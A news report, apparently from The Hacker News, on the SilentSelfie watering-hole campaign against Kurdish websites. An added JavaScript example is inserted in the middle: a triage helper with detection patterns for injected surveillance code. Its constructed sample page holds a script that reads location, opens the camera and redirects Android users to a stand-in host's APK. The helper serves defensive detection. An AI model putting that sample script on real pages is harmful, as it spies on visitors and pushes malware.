[Source – thehackernews.com]
Over the past year and a half, 25 websites connected to the Kurdish minority have been targeted in a sophisticated cyberattack aimed at harvesting sensitive user information. Dubbed “SilentSelfie Cyberattack,” this campaign has been traced back to December 2022 and is being described as a long-term watering hole attack. The details of this breach, which continues to affect several websites, were disclosed by French cybersecurity firm Sekoia, which has been closely monitoring the campaign.
The SilentSelfie Campaign: Long-Running and Sophisticated
Sekoia revealed that the SilentSelfie Cyberattack primarily targets websites associated with Kurdish press, media, and political organizations, including entities like the Rojava administration and its armed forces, as well as revolutionary far-left political parties in Türkiye and Kurdish regions. The hackers behind the attack compromised these websites with the intention of installing malicious software that collects sensitive data. The attack involves deploying four different variants of an information-stealing framework, ranging from simple scripts that record a user’s location to more complex malware that activates a device’s selfie camera or tricks users into downloading a malicious Android application (APK).
However, the method used to initially breach these websites remains unclear. Sekoia’s researchers, Felix Aimé and Maxime A, have not identified the initial compromise technique, but it is clear that the attackers are gathering a significant amount of user data, including location, device information, and public IP addresses. One of the more alarming aspects of the attack is its ability to record images from device cameras and redirect users to harmful APK files.
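The two paragraphs above describe the behaviours of the injected scripts (location and device collection, camera access, redirection to APK files) without showing code. The following is an added example, not code from the article or from Sekoia: a static triage helper a site operator could run over their own fetched HTML to flag inline scripts that combine those capabilities. The indicator names, the flagging threshold and the sample HTML are constructed for illustration.

```javascript
// Added example, not code from the article or from Sekoia: a static triage helper
// that flags inline scripts combining the capabilities the article attributes to
// the injected code (geolocation, device and public-IP collection, camera access,
// redirects to .apk files). Indicators, threshold and sample HTML are constructed.

const INDICATORS = [
  { name: "geolocation", re: /navigator\.geolocation\.(getCurrentPosition|watchPosition)\s*\(/ },
  { name: "camera", re: /mediaDevices\.getUserMedia\s*\(/ },
  { name: "device-info", re: /navigator\.(userAgent|platform|language|hardwareConcurrency)\b/ },
  { name: "public-ip-lookup", re: /fetch\s*\(\s*["'][^"']*\bip\b[^"']*["']/i },
  { name: "apk-redirect", re: /(location\.(href|assign|replace)|window\.open)[^;\n]*\.apk\b/i },
];

// Pull the bodies of non-empty inline <script> elements out of an HTML document.
function extractInlineScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim()) scripts.push(m[1]);
  }
  return scripts;
}

// Names of the indicators matched by one script body, in INDICATORS order.
function matchIndicators(js) {
  return INDICATORS.filter(({ re }) => re.test(js)).map(({ name }) => name);
}

// Flag a script when it redirects to an APK, or when it combines two or more
// of the data-collection capabilities. Returns one finding per flagged script.
function triageHtml(html) {
  return extractInlineScripts(html)
    .map((js, index) => ({ index, indicators: matchIndicators(js) }))
    .filter(({ indicators }) => indicators.includes("apk-redirect") || indicators.length >= 2);
}

// Constructed sample page: one ordinary analytics-style script and one that
// combines the behaviours described in the article.
const SAMPLE_HTML = `
<html><body>
<script>console.log(navigator.userAgent, navigator.language);</script>
<script>
  navigator.geolocation.getCurrentPosition((p) => report(p.coords));
  navigator.mediaDevices.getUserMedia({ video: true }).then(capture);
  if (/Android/.test(navigator.userAgent)) location.href = "https://example.invalid/update.apk";
</script>
</body></html>`;
console.log(JSON.stringify(triageHtml(SAMPLE_HTML), null, 2));
```

Only the second script is reported, with all four of its matched indicators; the analytics-style script touches a single capability and stays below the threshold.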
Targeted Kurdish Websites and the Unknown Threat Actor
The scope of the SilentSelfie Cyberattack has drawn attention due to its long duration and the number of affected websites. Beyond its focus on Kurdish websites, it resembles earlier cyberattacks carried out by groups like StrongPity and BladeHawk, which have also targeted the Kurdish community. Earlier in 2023, Dutch security firm Hunt & Hackett reported that Kurdish websites in the Netherlands had been similarly targeted by a Türkiye-linked group known as Sea Turtle. These coordinated attacks appear to form part of a larger pattern of cyber surveillance targeting Kurdish entities.
SilentSelfie, however, has yet to be linked to a known threat actor. Sekoia suggests the possibility that a newly emerging group, perhaps with limited experience or resources, could be behind the attacks. This theory is based on the campaign’s relatively low sophistication and the lack of persistence mechanisms in the deployed malware. Despite this, the attack remains effective due to the sheer number of websites it has compromised.
Uncertainty Surrounding the Origins of SilentSelfie
Although SilentSelfie lacks the hallmarks of more sophisticated campaigns, it remains notable for its longevity and scale. Some experts believe that the Kurdistan Regional Government of Iraq may be involved, citing the arrest of RojNews journalist Silêman Ehmed in 2023 by KDP forces. Ehmed was later sentenced to three years in prison in 2024, and his arrest has raised questions about possible links between the cyberattack and political motivations.
Sekoia’s analysis also found that one variant of the malicious script redirects users to rogue APK files on several websites, including rojnews[.]news and hawarnews[.]com. Once installed, these APKs collect sensitive data like location, contact lists, and files stored on the user’s device. Despite the attack’s limited sophistication, its long-term presence and potential for mass data harvesting have caused significant concern among cybersecurity experts.
In conclusion, while the full extent of the SilentSelfie Cyberattack’s impact and the identity of its perpetrators remain uncertain, this campaign highlights the ongoing vulnerability of Kurdish-related websites to cyber threats. As the situation develops, further investigations may shed more light on the motivations and actors behind this prolonged attack campaign.